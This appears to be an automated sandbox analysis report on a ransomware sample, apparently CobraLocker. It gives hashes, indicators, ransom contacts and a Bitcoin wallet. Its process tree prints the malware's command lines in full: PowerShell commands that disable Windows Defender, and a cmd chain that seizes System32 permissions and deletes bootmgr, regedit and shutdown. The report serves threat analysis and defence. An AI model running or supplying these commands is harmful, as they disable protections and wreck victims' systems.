Analysis
- max time kernel: 376s
- max time network: 375s
- platform: windows10_x64
- resource: win10-en-20210920
- submitted: 20-10-2021 09:26
- Static task: static1
General
- Target: b53415f6_lcvDB3iF4J.exe
- Size: 7.4MB
- MD5: b53415f6d38ce4831cbf327daf5201b4
- SHA1: 778d6f976e10d201903c76adcd18f14e685a3704
- SHA256: 4efcc256493c1c7d8f695bee676beab4aaf3d3d1e1847cf8462c38af1107b7b8
- SHA512: 0c2e2fd8ebfe175dc844d64ad9e85f8ab23f8e63b75d7773a38bf68741071c0ea6aa91402b1ab5813a7d66b289650b1e868c56dd86636dcc26c37c07bdb55bb4
Malware Config
Extracted from C:\Users\Admin\Desktop\DECRYPT-FILES.TXT:
- Emails: CobraLocker@mail2tor.com, f64dfn9pbhybaqfrh5dp65jrzcg@protonmail.com
- Wallet: bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe
- URL: http://mail2tor2zyjdctd.onion/
Signatures
- Maze: ransomware family also known as ChaCha.
- Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs)
- Disables Task Manager via registry modification
- Executes dropped EXE (1 IoC)
  Processes (pid | process):
  3184 | VSSVC.exe
- Modifies extensions of user files (1 IoC): ransomware generally changes the extension on encrypted files.
  Processes (description | ioc | process):
  File renamed | C:\Users\Admin\Pictures\ConfirmEdit.crw => C:\Users\Admin\Pictures\ConfirmEdit.crw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe | VSSVC.exe
- Possible privilege escalation attempt (5 IoCs)
  Processes (pid | process):
  2660 | takeown.exe
  4244 | icacls.exe
  1936 | takeown.exe
  2636 | takeown.exe
  296 | icacls.exe
- Checks BIOS information in registry (2 TTPs, 4 IoCs): BIOS information is often read in order to detect sandboxing environments.
  Processes (description | ioc | process):
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | b53415f6_lcvDB3iF4J.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | b53415f6_lcvDB3iF4J.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | VSSVC.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | VSSVC.exe
- Modifies file permissions (1 TTP, 5 IoCs)
  Processes (pid | process):
  4244 | icacls.exe
  1936 | takeown.exe
  2636 | takeown.exe
  296 | icacls.exe
  2660 | takeown.exe
- YARA rule matches (resource | yara_rule):
  behavioral1/memory/3600-118-0x00000000009C0000-0x00000000009C1000-memory.dmp | themida
  C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | themida
  C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | themida
  behavioral1/memory/3184-158-0x00000000008E0000-0x00000000008E1000-memory.dmp | themida
- Checks whether UAC is enabled
  Processes (description | ioc | process):
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | VSSVC.exe
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | b53415f6_lcvDB3iF4J.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  Processes (pid | process):
  3600 | b53415f6_lcvDB3iF4J.exe
  3184 | VSSVC.exe
- Enumerates physical storage devices (1 TTP): attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (12 IoCs)
  Processes (pid | process), three entries each:
  1688 | powershell.exe
  4372 | powershell.exe
  4368 | powershell.exe
  4560 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (11 IoCs)
  Processes (description | pid | process):
  Token: SeDebugPrivilege | 3600 | b53415f6_lcvDB3iF4J.exe (two entries)
  Token: SeDebugPrivilege | 4560 | powershell.exe
  Token: SeDebugPrivilege | 1688 | powershell.exe
  Token: SeDebugPrivilege | 4372 | powershell.exe
  Token: SeDebugPrivilege | 4368 | powershell.exe
  Token: SeDebugPrivilege | 3184 | VSSVC.exe (two entries)
  Token: SeTakeOwnershipPrivilege | 2636 | takeown.exe
  Token: SeTakeOwnershipPrivilege | 2660 | takeown.exe
  Token: SeTakeOwnershipPrivilege | 1936 | takeown.exe
- Suspicious use of WriteProcessMemory (33 IoCs)
  Processes (description | pid | process | target process), three entries each:
  PID 3600 wrote to memory of 4368 | 3600 | b53415f6_lcvDB3iF4J.exe | powershell.exe
  PID 3600 wrote to memory of 4372 | 3600 | b53415f6_lcvDB3iF4J.exe | powershell.exe
  PID 3600 wrote to memory of 1688 | 3600 | b53415f6_lcvDB3iF4J.exe | powershell.exe
  PID 3600 wrote to memory of 4560 | 3600 | b53415f6_lcvDB3iF4J.exe | powershell.exe
  PID 3600 wrote to memory of 3184 | 3600 | b53415f6_lcvDB3iF4J.exe | VSSVC.exe
  PID 3184 wrote to memory of 2340 | 3184 | VSSVC.exe | cmd.exe
  PID 2340 wrote to memory of 2636 | 2340 | cmd.exe | takeown.exe
  PID 2340 wrote to memory of 296 | 2340 | cmd.exe | icacls.exe
  PID 2340 wrote to memory of 2660 | 2340 | cmd.exe | takeown.exe
  PID 2340 wrote to memory of 4244 | 2340 | cmd.exe | icacls.exe
  PID 2340 wrote to memory of 1936 | 2340 | cmd.exe | takeown.exe
Processes (indented by tree depth)
- C:\Users\Admin\AppData\Local\Temp\b53415f6_lcvDB3iF4J.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\b53415f6_lcvDB3iF4J.exe"
  Signatures: Checks BIOS information in registry; Checks whether UAC is enabled; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent NeverSend
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting Disable
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\VSSVC.exe"
    Signatures: Executes dropped EXE; Modifies extensions of user files; Checks BIOS information in registry; Checks whether UAC is enabled; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && takeown /f C:\Windows\System32\shutdown.exe && icacls C:\Windows\System32\shutdown.exe /grant %username%:F && del C:\Windows\System32\shutdown.exe && Exit
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\takeown.exe
        Command line: takeown /f C:\Windows\System32
        Signatures: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\SysWOW64\icacls.exe
        Command line: icacls C:\Windows\System32 /grant Admin:F
        Signatures: Possible privilege escalation attempt; Modifies file permissions
      - C:\Windows\SysWOW64\takeown.exe
        Command line: takeown /f C:\Windows\System32\drivers
        Signatures: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\SysWOW64\icacls.exe
        Command line: icacls C:\Windows\System32\drivers /grant Admin:F
        Signatures: Possible privilege escalation attempt; Modifies file permissions
      - C:\Windows\SysWOW64\takeown.exe
        Command line: takeown /f C:\Windows\System32\LogonUI.exe
        Signatures: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\rundll32.exe
  Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
- C:\Windows\system32\NOTEPAD.EXE
  Command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\DECRYPT-FILES.TXT
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
- C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
- C:\Users\Admin\Desktop\DECRYPT-FILES.TXT